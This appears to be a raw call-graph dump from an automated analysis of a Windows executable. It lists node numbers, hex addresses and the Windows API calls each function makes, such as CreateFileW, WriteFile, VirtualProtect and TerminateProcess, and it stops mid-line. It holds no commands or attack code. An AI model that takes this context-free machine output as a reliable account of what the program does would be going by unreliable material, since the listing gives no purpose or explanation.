ff4baa 95481->95482 95482->95482 95562 fb6f34 22 API calls 95483->95562 95485 fcfddb 22 API calls 95484->95485 95487 fb6bae 95485->95487 95489 fcfe0b 22 API calls 95487->95489 95488 fb6b85 __fread_nolock 95488->95422 95489->95488 95491 fb9cc2 _wcslen 95490->95491 95492 fcfe0b 22 API calls 95491->95492 95493 fb9cea __fread_nolock 95492->95493 95494 fcfddb 22 API calls 95493->95494 95495 fb9d00 95494->95495 95495->95420 95499 fcfde0 95496->95499 95498 fcfdfa 95498->95430 95499->95498 95502 fcfdfc 95499->95502 95506 fdea0c 95499->95506 95513 fd4ead 7 API calls 2 library calls 95499->95513 95501 fd066d 95515 fd32a4 RaiseException 95501->95515 95502->95501 95514 fd32a4 RaiseException 95502->95514 95505 fd068a 95505->95430 95511 fe3820 pre_c_initialization 95506->95511 95507 fe385e 95517 fdf2d9 20 API calls __dosmaperr 95507->95517 95509 fe3849 RtlAllocateHeap 95510 fe385c 95509->95510 95509->95511 95510->95499 95511->95507 95511->95509 95516 fd4ead 7 API calls 2 library calls 95511->95516 95513->95499 95514->95501 95515->95505 95516->95511 95517->95510 95519 fb3a67 GetModuleFileNameW 95518->95519 95519->95434 95521 ff1f50 __wsopen_s 95520->95521 95522 fb3aaf GetFullPathNameW 95521->95522 95523 fb3ae9 95522->95523 95524 fb3ace 95522->95524 95525 fba6c3 22 API calls 95523->95525 95526 fb6b57 22 API calls 95524->95526 95527 fb3ada 95525->95527 95526->95527 95530 fb37a0 95527->95530 95531 fb37ae 95530->95531 95534 fb93b2 95531->95534 95533 fb37c2 95533->95437 95535 fb93c9 __fread_nolock 95534->95535 95536 fb93c0 95534->95536 95535->95533 95536->95535 95538 fbaec9 95536->95538 95539 fbaed9 __fread_nolock 95538->95539 95540 fbaedc 95538->95540 95539->95535 95541 fcfddb 22 API calls 95540->95541 95542 fbaee7 95541->95542 95543 fcfe0b 22 API calls 95542->95543 95543->95539 95545 fb33fe _wcslen 95544->95545 95546 ff311d 95545->95546 95547 fb3411 95545->95547 95549 fcfddb 22 API calls 95546->95549 95554 fba587 95547->95554 95551 ff3127 95549->95551 95550 fb341e __fread_nolock 95550->95449 95552 fcfe0b 22 API calls 95551->95552 95553 ff3157 __fread_nolock 95552->95553 95555 fba59d 95554->95555 95558 fba598 __fread_nolock 95554->95558 95556 fff80f 95555->95556 95557 fcfe0b 22 API calls 95555->95557 95557->95558 95558->95550 95559->95469 95560->95470 95561->95474 95562->95488 95563 1002a00 95569 fbd7b0 ISource 95563->95569 95564 fbdb11 PeekMessageW 95564->95569 95565 fbd807 GetInputState 95565->95564 95565->95569 95566 fbd9d5 95567 1001cbe TranslateAcceleratorW 95567->95569 95569->95564 95569->95565 95569->95566 95569->95567 95570 fbdb8f PeekMessageW 95569->95570 95571 fbda04 timeGetTime 95569->95571 95572 fbdb73 TranslateMessage DispatchMessageW 95569->95572 95573 fbdbaf Sleep 95569->95573 95574 1002b74 Sleep 95569->95574 95575 1001dda timeGetTime 95569->95575 95595 fbdd50 95569->95595 95602 fbdfd0 95569->95602 95625 fc1310 95569->95625 95678 fbbf40 207 API calls 2 library calls 95569->95678 95679 fcedf6 IsDialogMessageW GetClassLongW 95569->95679 95681 1023a2a 23 API calls 95569->95681 95682 fbec40 95569->95682 95706 102359c 82 API calls __wsopen_s 95569->95706 95570->95569 95571->95569 95572->95570 95588 fbdbc0 95573->95588 95574->95588 95680 fce300 23 API calls 95575->95680 95576 fce551 timeGetTime 95576->95588 95579 1002c0b GetExitCodeProcess 95582 1002c21 WaitForSingleObject 95579->95582 95583 1002c37 CloseHandle 95579->95583 95580 10429bf GetForegroundWindow 95580->95588 95582->95569 95582->95583 95583->95588 95584 1002a31 95584->95566 95585 1002ca9 Sleep 95585->95569 95588->95566 95588->95569 95588->95576 95588->95579 95588->95580 95588->95584 95588->95585 95707 1035658 23 API calls 95588->95707 95708 101e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95588->95708 95709 101d4dc 47 API calls 95588->95709 95596 fbdd6f 95595->95596 95598 fbdd83 95595->95598 95710 fbd260 207 API calls 2 library calls 95596->95710 95711 102359c 82 API calls __wsopen_s 95598->95711 95599 fbdd7a 95599->95569 95601 1002f75 95601->95601 95603 fbe010 95602->95603 95619 fbe0dc ISource 95603->95619 95715 fd0242 5 API calls __Init_thread_wait 95603->95715 95606 1002fca 95608 fba961 22 API calls 95606->95608 95606->95619 95607 fba961 22 API calls 95607->95619 95611 1002fe4 95608->95611 95716 fd00a3 29 API calls __onexit 95611->95716 95613 1002fee 95717 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95613->95717 95616 fbec40 207 API calls 95616->95619 95619->95607 95619->95616 95620 fbe3e1 95619->95620 95621 fc04f0 22 API calls 95619->95621 95622 102359c 82 API calls 95619->95622 95712 fba8c7 22 API calls __fread_nolock 95619->95712 95713 fba81b 41 API calls 95619->95713 95714 fca308 207 API calls 95619->95714 95718 fd0242 5 API calls __Init_thread_wait 95619->95718 95719 fd00a3 29 API calls __onexit 95619->95719 95720 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95619->95720 95721 10347d4 207 API calls 95619->95721 95722 10368c1 207 API calls 95619->95722 95620->95569 95621->95619 95622->95619 95626 fc1376 95625->95626 95627 fc17b0 95625->95627 95628 1006331 95626->95628 95631 fc1940 9 API calls 95626->95631 95849 fd0242 5 API calls __Init_thread_wait 95627->95849 95808 103709c 95628->95808 95634 fc13a0 95631->95634 95632 fc17ba 95635 fc17fb 95632->95635 95637 fb9cb3 22 API calls 95632->95637 95633 100633d 95633->95569 95636 fc1940 9 API calls 95634->95636 95639 1006346 95635->95639 95641 fc182c 95635->95641 95638 fc13b6 95636->95638 95644 fc17d4 95637->95644 95638->95635 95640 fc13ec 95638->95640 95854 102359c 82 API calls __wsopen_s 95639->95854 95640->95639 95665 fc1408 __fread_nolock 95640->95665 95851 fbaceb 23 API calls ISource 95641->95851 95850 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95644->95850 95645 fc1839 95852 fcd217 207 API calls 95645->95852 95648 100636e 95855 102359c 82 API calls __wsopen_s 95648->95855 95649 fc152f 95651 fc153c 95649->95651 95652 10063d1 95649->95652 95654 fc1940 9 API calls 95651->95654 95857 1035745 54 API calls _wcslen 95652->95857 95655 fc1549 95654->95655 95661 fc1940 9 API calls 95655->95661 95670 fc15c7 ISource 95655->95670 95656 fcfddb 22 API calls 95656->95665 95657 fc1872 95657->95628 95853 fcfaeb 23 API calls 95657->95853 95658 fcfe0b 22 API calls 95658->95665 95660 fc171d 95660->95569 95668 fc1563 95661->95668 95663 fbec40 207 API calls 95663->95665 95664 fc167b ISource 95664->95660 95848 fcce17 22 API calls ISource 95664->95848 95665->95645 95665->95648 95665->95649 95665->95656 95665->95658 95665->95663 95669 10063b2 95665->95669 95665->95670 95668->95670 95858 fba8c7 22 API calls __fread_nolock 95668->95858 95856 102359c 82 API calls __wsopen_s 95669->95856 95670->95657 95670->95664 95723 fc1940 95670->95723 95733 fb6246 95670->95733 95737 102744a 95670->95737 95793 10283da 95670->95793 95796 103958b 95670->95796 95799 102f0ec 95670->95799 95859 102359c 82 API calls __wsopen_s 95670->95859 95678->95569 95679->95569 95680->95569 95681->95569 95702 fbec76 ISource 95682->95702 95684 fbfef7 95698 fbed9d ISource 95684->95698 96163 fba8c7 22 API calls __fread_nolock 95684->96163 95685 fcfddb 22 API calls 95685->95702 95687 1004b0b 96165 102359c 82 API calls __wsopen_s 95687->96165 95688 fba8c7 22 API calls 95688->95702 95689 1004600 95689->95698 96162 fba8c7 22 API calls __fread_nolock 95689->96162 95694 fd0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95694->95702 95696 fbfbe3 95696->95698 95700 1004bdc 95696->95700 95705 fbf3ae ISource 95696->95705 95697 fba961 22 API calls 95697->95702 95698->95569 95699 fd00a3 29 API calls pre_c_initialization 95699->95702 96166 102359c 82 API calls __wsopen_s 95700->96166 95702->95684 95702->95685 95702->95687 95702->95688 95702->95689 95702->95694 95702->95696 95702->95697 95702->95698 95702->95699 95703 1004beb 95702->95703 95704 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95702->95704 95702->95705 96160 fc01e0 207 API calls 2 library calls 95702->96160 96161 fc06a0 41 API calls ISource 95702->96161 96167 102359c 82 API calls __wsopen_s 95703->96167 95704->95702 95705->95698 96164 102359c 82 API calls __wsopen_s 95705->96164 95706->95569 95707->95588 95708->95588 95709->95588 95710->95599 95711->95601 95712->95619 95713->95619 95714->95619 95715->95606 95716->95613 95717->95619 95718->95619 95719->95619 95720->95619 95721->95619 95722->95619 95724 fc195d 95723->95724 95725 fc1981 95723->95725 95732 fc196e 95724->95732 95862 fd0242 5 API calls __Init_thread_wait 95724->95862 95860 fd0242 5 API calls __Init_thread_wait 95725->95860 95727 fc198b 95727->95724 95861 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95727->95861 95729 fc8727 95729->95732 95863 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95729->95863 95732->95670 95734 fb625f 95733->95734 95735 fb6250 95733->95735 95734->95735 95736 fb6264 CloseHandle 95734->95736 95735->95670 95736->95735 95738 1027474 95737->95738 95739 1027469 95737->95739 95741 1027554 95738->95741 95743 fba961 22 API calls 95738->95743 95895 fbb567 39 API calls 95739->95895 95742 fcfddb 22 API calls 95741->95742 95782 10276a4 95741->95782 95744 1027587 95742->95744 95746 1027495 95743->95746 95745 fcfe0b 22 API calls 95744->95745 95747 1027598 95745->95747 95748 fba961 22 API calls 95746->95748 95749 fb6246 CloseHandle 95747->95749 95750 102749e 95748->95750 95751 10275a3 95749->95751 95752 fb7510 53 API calls 95750->95752 95753 fba961 22 API calls 95751->95753 95754 10274aa 95752->95754 95756 10275ab 95753->95756 95896 fb525f 22 API calls 95754->95896 95758 fb6246 CloseHandle 95756->95758 95757 10274bf 95897 fb6350 95757->95897 95760 10275b2 95758->95760 95864 fb7510 95760->95864 95763 102754a 95908 fbb567 39 API calls 95763->95908 95766 fb6246 CloseHandle 95769 10275c8 95766->95769 95768 1027502 95768->95763 95770 1027506 95768->95770 95887 fb5745 95769->95887 95771 fb9cb3 22 API calls 95770->95771 95773 1027513 95771->95773 95907 101d2c1 26 API calls 95773->95907 95775 10275ea 95909 fb53de 27 API calls ISource 95775->95909 95776 10276de GetLastError 95778 10276f7 95776->95778 95916 fb6216 CloseHandle ISource 95778->95916 95781 10275f8 95910 fb53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95781->95910 95782->95670 95783 102751c 95783->95763 95785 1027645 95786 fcfddb 22 API calls 95785->95786 95788 1027679 95786->95788 95787 10275ff 95787->95785 95911 101ccff 95787->95911 95790 fba961 22 API calls 95788->95790 95791 1027686 95790->95791 95791->95782 95915 101417d 22 API calls __fread_nolock 95791->95915 95935 10298e3 95793->95935 95795 10283ea 95795->95670 96004 1037f59 95796->96004 95798 103959b 95798->95670 95800 fb7510 53 API calls 95799->95800 95801 102f126 95800->95801 96097 fb9e90 95801->96097 95803 102f136 95804 fbec40 207 API calls 95803->95804 95806 102f15b 95803->95806 95804->95806 95807 102f15f 95806->95807 96125 fb9c6e 22 API calls 95806->96125 95807->95670 95809 10370f5 95808->95809 95810 10370db 95808->95810 96141 1035689 95809->96141 96152 102359c 82 API calls __wsopen_s 95810->96152 95814 fbec40 206 API calls 95815 1037164 95814->95815 95816 10371ff 95815->95816 95819 10371a6 95815->95819 95825 10370ed 95815->95825 95817 1037253 95816->95817 95818 1037205 95816->95818 95820 fb7510 53 API calls 95817->95820 95817->95825 96153 1021119 22 API calls 95818->96153 95823 1020acc 22 API calls 95819->95823 95821 1037265 95820->95821 95824 fbaec9 22 API calls 95821->95824 95827 10371de 95823->95827 95828 1037289 CharUpperBuffW 95824->95828 95825->95633 95826 1037228 96154 fba673 22 API calls 95826->96154 95831 fc1310 206 API calls 95827->95831 95832 10372a3 95828->95832 95830 1037230 96155 fbbf40 207 API calls 2 library calls 95830->96155 95831->95825 95833 10372f6 95832->95833 95834 10372aa 95832->95834 95836 fb7510 53 API calls 95833->95836 96148 1020acc 95834->96148 95837 10372fe 95836->95837 96156 fce300 23 API calls 95837->96156 95841 fc1310 206 API calls 95841->95825 95842 1037308 95842->95825 95843 fb7510 53 API calls 95842->95843 95844 1037323 95843->95844 96157 fba673 22 API calls 95844->96157 95846 1037333 96158 fbbf40 207 API calls 2 library calls 95846->96158 95848->95664 95849->95632 95850->95635 95851->95645 95852->95657 95853->95657 95854->95670 95855->95670 95856->95670 95857->95668 95858->95670 95859->95670 95860->95727 95861->95724 95862->95729 95863->95732 95865 fb7522 95864->95865 95866 fb7525 95864->95866 95865->95766 95867 fb755b 95866->95867 95868 fb752d 95866->95868 95869 ff50f6 95867->95869 95871 fb756d 95867->95871 95878 ff500f 95867->95878 95917 fd51c6 26 API calls 95868->95917 95920 fd5183 26 API calls 95869->95920 95918 fcfb21 51 API calls 95871->95918 95872 fb753d 95877 fcfddb 22 API calls 95872->95877 95875 ff510e 95875->95875 95879 fb7547 95877->95879 95881 fcfe0b 22 API calls 95878->95881 95886 ff5088 95878->95886 95880 fb9cb3 22 API calls 95879->95880 95880->95865 95882 ff5058 95881->95882 95883 fcfddb 22 API calls 95882->95883 95884 ff507f 95883->95884 95885 fb9cb3 22 API calls 95884->95885 95885->95886 95919 fcfb21 51 API calls 95886->95919 95888 fb575c CreateFileW 95887->95888 95889 ff4035 95887->95889 95891 fb577b 95888->95891 95890 ff403b CreateFileW 95889->95890 95889->95891 95890->95891 95892 ff4063 95890->95892 95891->95775 95891->95776 95921 fb54c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95892->95921 95894 ff406e 95894->95891 95895->95738 95896->95757 95898 fb6362 95897->95898 95899 ff4a51 95897->95899 95922 fb6373 95898->95922 95932 fb4a88 22 API calls __fread_nolock 95899->95932 95902 fb636e 95902->95763 95906 101d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 95902->95906 95903 ff4a5b 95904 ff4a67 95903->95904 95933 fba8c7 22 API calls __fread_nolock 95903->95933 95906->95768 95907->95783 95908->95741 95909->95781 95910->95787 95912 101cd19 WriteFile 95911->95912 95913 101cd0e 95911->95913 95912->95785 95934 101cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95913->95934 95915->95782 95916->95782 95917->95872 95918->95872 95919->95869 95920->95875 95921->95894 95923 fb63b6 __fread_nolock 95922->95923 95924 fb6382 95922->95924 95923->95902 95924->95923 95925 ff4a82 95924->95925 95926 fb63a9 95924->95926 95928 fcfddb 22 API calls 95925->95928 95927 fba587 22 API calls 95926->95927 95927->95923 95929 ff4a91 95928->95929 95930 fcfe0b 22 API calls 95929->95930 95931 ff4ac5 __fread_nolock 95930->95931 95932->95903 95933->95904 95934->95912 95936 1029902 95935->95936 95937 10299e8 95935->95937 95938 fcfddb 22 API calls 95936->95938 95993 1029caa 39 API calls 95937->95993 95940 1029909 95938->95940 95941 fcfe0b 22 API calls 95940->95941 95942 102991a 95941->95942 95945 fb6246 CloseHandle 95942->95945 95943 10299a2 95944 1029ac5 95943->95944 95947 10299ca 95943->95947 95951 1029a33 95943->95951 95986 1021e96 95944->95986 95946 1029925 95945->95946 95949 fba961 22 API calls 95946->95949 95947->95795 95952 102992d 95949->95952 95950 1029acc 95955 101ccff 4 API calls 95950->95955 95953 fb7510 53 API calls 95951->95953 95954 fb6246 CloseHandle 95952->95954 95962 1029a3a 95953->95962 95956 1029934 95954->95956 95980 1029aa8 95955->95980 95958 fb7510 53 API calls 95956->95958 95957 1029abb 96001 101cd57 30 API calls 95957->96001 95961 1029940 95958->95961 95959 1029a6e 95994 fb6270 95959->95994 95964 fb6246 CloseHandle 95961->95964 95962->95957 95962->95959 95966 102994a 95964->95966 95969 fb5745 5 API calls 95966->95969 95967 fb6246 CloseHandle 95970 1029b1e 95967->95970 95968 1029a8e 95973 fb33c6 22 API calls 95968->95973 95972 1029959 95969->95972 96002 fb6216 CloseHandle ISource 95970->96002 95975 10299c2 95972->95975 95976 102995d 95972->95976 95977 1029a9c 95973->95977 95992 fb6216 CloseHandle ISource 95975->95992 95990 fb53de 27 API calls ISource 95976->95990 96000 101cd57 30 API calls 95977->96000 95980->95947 95980->95967 95982 102996b 95991 fb53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95982->95991 95984 1029972 95984->95943 95985 101ccff 4 API calls 95984->95985 95985->95943 95987 1021e9f 95986->95987 95989 1021ea4 95986->95989 96003 1020f67 24 API calls __fread_nolock 95987->96003 95989->95950 95990->95982 95991->95984 95992->95947 95993->95943 95995 fcfe0b 22 API calls 95994->95995 95996 fb6295 95995->95996 95997 fcfddb 22 API calls 95996->95997 95998 fb62a3 95997->95998 95998->95968 95999 fba8c7 22 API calls __fread_nolock 95998->95999 95999->95968 96000->95980 96001->95980 96002->95947 96003->95989 96005 fb7510 53 API calls 96004->96005 96006 1037f90 96005->96006 96029 1037fd5 ISource 96006->96029 96042 1038cd3 96006->96042 96008 1038281 96009 103844f 96008->96009 96013 103828f 96008->96013 96083 1038ee4 60 API calls 96009->96083 96012 103845e 96012->96013 96014 103846a 96012->96014 96055 1037e86 96013->96055 96014->96029 96015 fb7510 53 API calls 96033 1038049 96015->96033 96020 10382c8 96070 fcfc70 96020->96070 96023 1038302 96077 fb63eb 22 API calls 96023->96077 96024 10382e8 96076 102359c 82 API calls __wsopen_s 96024->96076 96027 10382f3 GetCurrentProcess TerminateProcess 96027->96023 96028 1038311 96078 fb6a50 22 API calls 96028->96078 96029->95798 96031 103832a 96041 1038352 96031->96041 96079 fc04f0 22 API calls 96031->96079 96033->96008 96033->96015 96033->96029 96074 101417d 22 API calls __fread_nolock 96033->96074 96075 103851d 42 API calls _strftime 96033->96075 96034 10384c5 96034->96029 96037 10384d9 FreeLibrary 96034->96037 96035 1038341 96080 1038b7b 75 API calls 96035->96080 96037->96029 96041->96034 96081 fc04f0 22 API calls 96041->96081 96082 fbaceb 23 API calls ISource 96041->96082 96084 1038b7b 75 API calls 96041->96084 96043 fbaec9 22 API calls 96042->96043 96044 1038cee CharLowerBuffW 96043->96044 96085 1018e54 96044->96085 96048 fba961 22 API calls 96049 1038d2a 96048->96049 96092 fb6d25 22 API calls __fread_nolock 96049->96092 96051 1038d3e 96052 fb93b2 22 API calls 96051->96052 96054 1038d48 _wcslen 96052->96054 96053 1038e5e _wcslen 96053->96033 96054->96053 96093 103851d 42 API calls _strftime 96054->96093 96056 1037eec 96055->96056 96057 1037ea1 96055->96057 96061 1039096 96056->96061 96058 fcfe0b 22 API calls 96057->96058 96059 1037ec3 96058->96059 96059->96056 96060 fcfddb 22 API calls 96059->96060 96060->96059 96062 10392ab ISource 96061->96062 96069 10390ba _strcat _wcslen 96061->96069 96062->96020 96063 fbb38f 39 API calls 96063->96069 96064 fbb567 39 API calls 96064->96069 96065 fbb6b5 39 API calls 96065->96069 96066 fb7510 53 API calls 96066->96069 96067 fdea0c 21 API calls ___std_exception_copy 96067->96069 96069->96062 96069->96063 96069->96064 96069->96065 96069->96066 96069->96067 96096 101efae 24 API calls _wcslen 96069->96096 96072 fcfc85 96070->96072 96071 fcfd1d VirtualProtect 96073 fcfceb 96071->96073 96072->96071 96072->96073 96073->96023 96073->96024 96074->96033 96075->96033 96076->96027 96077->96028 96078->96031 96079->96035 96080->96041 96081->96041 96082->96041 96083->96012 96084->96041 96086 1018e74 _wcslen 96085->96086 96087 1018f63 96086->96087 96090 1018ea9 96086->96090 96091 1018f68 96086->96091 96087->96048 96087->96054 96090->96087 96094 fcce60 41 API calls 96090->96094 96091->96087 96095 fcce60 41 API calls 96091->96095 96092->96051 96093->96053 96094->96090 96095->96091 96096->96069 96098 fb6270 22 API calls 96097->96098 96124 fb9eb5 96098->96124 96099 fb9fd2 96127 fba4a1 96099->96127 96101 fb9fec 96101->95803 96104 fba6c3 22 API calls 96104->96124 96105 fff7c4 96139 10196e2 84 API calls __wsopen_s 96105->96139 96106 fff699 96112 fcfddb 22 API calls 96106->96112 96108 fba405 96108->96101 96140 10196e2 84 API calls __wsopen_s 96108->96140 96109 fba4a1 22 API calls 96109->96124 96114 fff754 96112->96114 96113 fff7d2 96115 fba4a1 22 API calls 96113->96115 96117 fcfe0b 22 API calls 96114->96117 96116 fff7e8 96115->96116 96116->96101 96119 fba12c __fread_nolock 96117->96119 96119->96105 96119->96108 96120 fba587 22 API calls 96120->96124 96121 fbaec9 22 API calls 96122 fba0db CharUpperBuffW 96121->96122 96135 fba673 22 API calls 96122->96135 96124->96099 96124->96104 96124->96105 96124->96106 96124->96108 96124->96109 96124->96119 96124->96120 96124->96121 96126 fb4573 41 API calls _wcslen 96124->96126 96136 fb48c8 23 API calls 96124->96136 96137 fb49bd 22 API calls __fread_nolock 96124->96137 96138 fba673 22 API calls 96124->96138 96125->95807 96126->96124 96128 fba52b 96127->96128 96134 fba4b1 __fread_nolock 96127->96134 96131 fcfe0b 22 API calls 96128->96131 96129 fcfddb 22 API calls 96130 fba4b8 96129->96130 96132 fcfddb 22 API calls 96130->96132 96133 fba4d6 96130->96133 96131->96134 96132->96133 96133->96101 96134->96129 96135->96124 96136->96124 96137->96124 96138->96124 96139->96113 96140->96101 96142 10356a4 96141->96142 96147 10356f2 96141->96147 96143 fcfe0b 22 API calls 96142->96143 96144 10356c6 96143->96144 96145 fcfddb 22 API calls 96144->96145 96144->96147 96159 1020a59 22 API calls 96144->96159 96145->96144 96147->95814 96149 1020ada 96148->96149 96150 1020b13 96148->96150 96149->96150 96151 fcfddb 22 API calls 96149->96151 96150->95841 96151->96150 96152->95825 96153->95826 96154->95830 96155->95825 96156->95842 96157->95846 96158->95825 96159->96144 96160->95702 96161->95702 96162->95698 96163->95698 96164->95698 96165->95698 96166->95703 96167->95698 96168 1003a41 96172 10210c0 96168->96172 96170 1003a4c 96171 10210c0 53 API calls 96170->96171 96171->96170 96178 10210fa 96172->96178 96180 10210cd 96172->96180 96173 10210fc 96184 fcfa11 53 API calls 96173->96184 96174 1021101 96176 fb7510 53 API calls 96174->96176 96177 1021108 96176->96177 96179 fb6350 22 API calls 96177->96179 96178->96170 96179->96178 96180->96173 96180->96174 96180->96178 96181 10210f4 96180->96181 96183 fbb270 39 API calls 96181->96183 96183->96178 96184->96174 96185 fb1098 96190 fb42de 96185->96190 96189 fb10a7 96191 fba961 22 API calls 96190->96191 96192 fb42f5 GetVersionExW 96191->96192 96193 fb6b57 22 API calls 96192->96193 96194 fb4342 96193->96194 96195 fb93b2 22 API calls 96194->96195 96197 fb4378 96194->96197 96196 fb436c 96195->96196 96199 fb37a0 22 API calls 96196->96199 96198 fb441b GetCurrentProcess IsWow64Process 96197->96198 96205 ff37df 96197->96205 96200 fb4437 96198->96200 96199->96197 96201 fb444f LoadLibraryA 96200->96201 96202 ff3824 GetSystemInfo 96200->96202 96203 fb449c GetSystemInfo 96201->96203 96204 fb4460 GetProcAddress 96201->96204 96207 fb4476 96203->96207 96204->96203 96206 fb4470 GetNativeSystemInfo 96204->96206 96206->96207 96208 fb447a FreeLibrary 96207->96208 96209 fb109d 96207->96209 96208->96209 96210 fd00a3 29 API calls __onexit 96209->96210 96210->96189 96211 fbf7bf 96212 fbf7d3 96211->96212 96213 fbfcb6 96211->96213 96215 fbfcc2 96212->96215 96216 fcfddb 22 API calls 96212->96216 96248 fbaceb 23 API calls ISource 96213->96248 96249 fbaceb 23 API calls ISource 96215->96249 96218 fbf7e5 96216->96218 96218->96215 96219 fbf83e 96218->96219 96220 fbfd3d 96218->96220 96222 fc1310 207 API calls 96219->96222 96244 fbed9d ISource 96219->96244 96250 1021155 22 API calls 96220->96250 96243 fbec76 ISource 96222->96243 96224 fbfef7 96224->96244 96252 fba8c7 22 API calls __fread_nolock 96224->96252 96226 1004b0b 96254 102359c 82 API calls __wsopen_s 96226->96254 96227 1004600 96227->96244 96251 fba8c7 22 API calls __fread_nolock 96227->96251 96232 fba8c7 22 API calls 96232->96243 96234 fd0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96234->96243 96235 fbfbe3 96237 1004bdc 96235->96237 96235->96244 96245 fbf3ae ISource 96235->96245 96236 fba961 22 API calls 96236->96243 96255 102359c 82 API calls __wsopen_s 96237->96255 96239 1004beb 96256 102359c 82 API calls __wsopen_s 96239->96256 96240 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96240->96243 96241 fd00a3 29 API calls pre_c_initialization 96241->96243 96242 fcfddb 22 API calls 96242->96243 96243->96224 96243->96226 96243->96227 96243->96232 96243->96234 96243->96235 96243->96236 96243->96239 96243->96240 96243->96241 96243->96242 96243->96244 96243->96245 96246 fc01e0 207 API calls 2 library calls 96243->96246 96247 fc06a0 41 API calls ISource 96243->96247 96245->96244 96253 102359c 82 API calls __wsopen_s 96245->96253 96246->96243 96247->96243 96248->96215 96249->96220 96250->96244 96251->96244 96252->96244 96253->96244 96254->96244 96255->96239 96256->96244 96257 fd03fb 96258 fd0407 ___BuildCatchObject 96257->96258 96286 fcfeb1 96258->96286 96260 fd040e 96261 fd0561 96260->96261 96264 fd0438 96260->96264 96313 fd083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96261->96313 96263 fd0568 96314 fd4e52 28 API calls _abort 96263->96314 96275 fd0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96264->96275 96297 fe247d 96264->96297 96266 fd056e 96315 fd4e04 28 API calls _abort 96266->96315 96270 fd0576 96271 fd0457 96273 fd04d8 96305 fd0959 96273->96305 96275->96273 96309 fd4e1a 38 API calls 2 library calls 96275->96309 96277 fd04de 96278 fd04f3 96277->96278 96310 fd0992 GetModuleHandleW 96278->96310 96280 fd04fa 96280->96263 96281 fd04fe 96280->96281 96282 fd0507 96281->96282 96311 fd4df5 28 API calls _abort 96281->96311 96312 fd0040 13 API calls 2 library calls 96282->96312 96285 fd050f 96285->96271 96287 fcfeba 96286->96287 96316 fd0698 IsProcessorFeaturePresent 96287->96316 96289 fcfec6 96317 fd2c94 10 API calls 3 library calls 96289->96317 96291 fcfecf 96291->96260 96292 fcfecb 96292->96291 96318 fe2317 96292->96318 96295 fcfee6 96295->96260 96300 fe2494 96297->96300 96298 fd0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96299 fd0451 96298->96299 96299->96271 96301 fe2421 96299->96301 96300->96298 96302 fe2450 96301->96302 96303 fd0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96302->96303 96304 fe2479 96303->96304 96304->96275 96393 fd2340 96305->96393 96308 fd097f 96308->96277 96309->96273 96310->96280 96311->96282 96312->96285 96313->96263 96314->96266 96315->96270 96316->96289 96317->96292 96322 fed1f6 96318->96322 96321 fd2cbd 8 API calls 3 library calls 96321->96291 96325 fed213 96322->96325 96326 fed20f 96322->96326 96324 fcfed8 96324->96295 96324->96321 96325->96326 96328 fe4bfb 96325->96328 96340 fd0a8c 96326->96340 96329 fe4c07 ___BuildCatchObject 96328->96329 96347 fe2f5e EnterCriticalSection 96329->96347 96331 fe4c0e 96348 fe50af 96331->96348 96333 fe4c1d 96339 fe4c2c 96333->96339 96361 fe4a8f 29 API calls 96333->96361 96336 fe4c27 96362 fe4b45 GetStdHandle GetFileType 96336->96362 96337 fe4c3d __fread_nolock 96337->96325 96363 fe4c48 LeaveCriticalSection _abort 96339->96363 96341 fd0a95 96340->96341 96342 fd0a97 IsProcessorFeaturePresent 96340->96342 96341->96324 96344 fd0c5d 96342->96344 96392 fd0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96344->96392 96346 fd0d40 96346->96324 96347->96331 96349 fe50bb ___BuildCatchObject 96348->96349 96350 fe50df 96349->96350 96351 fe50c8 96349->96351 96364 fe2f5e EnterCriticalSection 96350->96364 96372 fdf2d9 20 API calls __dosmaperr 96351->96372 96354 fe50cd 96373 fe27ec 26 API calls pre_c_initialization 96354->96373 96356 fe50d7 __fread_nolock 96356->96333 96357 fe5117 96374 fe513e LeaveCriticalSection _abort 96357->96374 96358 fe50eb 96358->96357 96365 fe5000 96358->96365 96361->96336 96362->96339 96363->96337 96364->96358 96375 fe4c7d 96365->96375 96367 fe5012 96371 fe501f 96367->96371 96382 fe3405 11 API calls 2 library calls 96367->96382 96369 fe5071 96369->96358 96383 fe29c8 96371->96383 96372->96354 96373->96356 96374->96356 96380 fe4c8a pre_c_initialization 96375->96380 96376 fe4cca 96390 fdf2d9 20 API calls __dosmaperr 96376->96390 96377 fe4cb5 RtlAllocateHeap 96379 fe4cc8 96377->96379 96377->96380 96379->96367 96380->96376 96380->96377 96389 fd4ead 7 API calls 2 library calls 96380->96389 96382->96367 96384 fe29d3 RtlFreeHeap 96383->96384 96385 fe29fc __dosmaperr 96383->96385 96384->96385 96386 fe29e8 96384->96386 96385->96369 96391 fdf2d9 20 API calls __dosmaperr 96386->96391 96388 fe29ee GetLastError 96388->96385 96389->96380 96390->96379 96391->96388 96392->96346 96394 fd096c GetStartupInfoW 96393->96394 96394->96308 96395 fb1033 96400 fb4c91 96395->96400 96399 fb1042 96401 fba961 22 API calls 96400->96401 96402 fb4cff 96401->96402 96408 fb3af0 96402->96408 96404 fb4d9c 96406 fb1038 96404->96406 96411 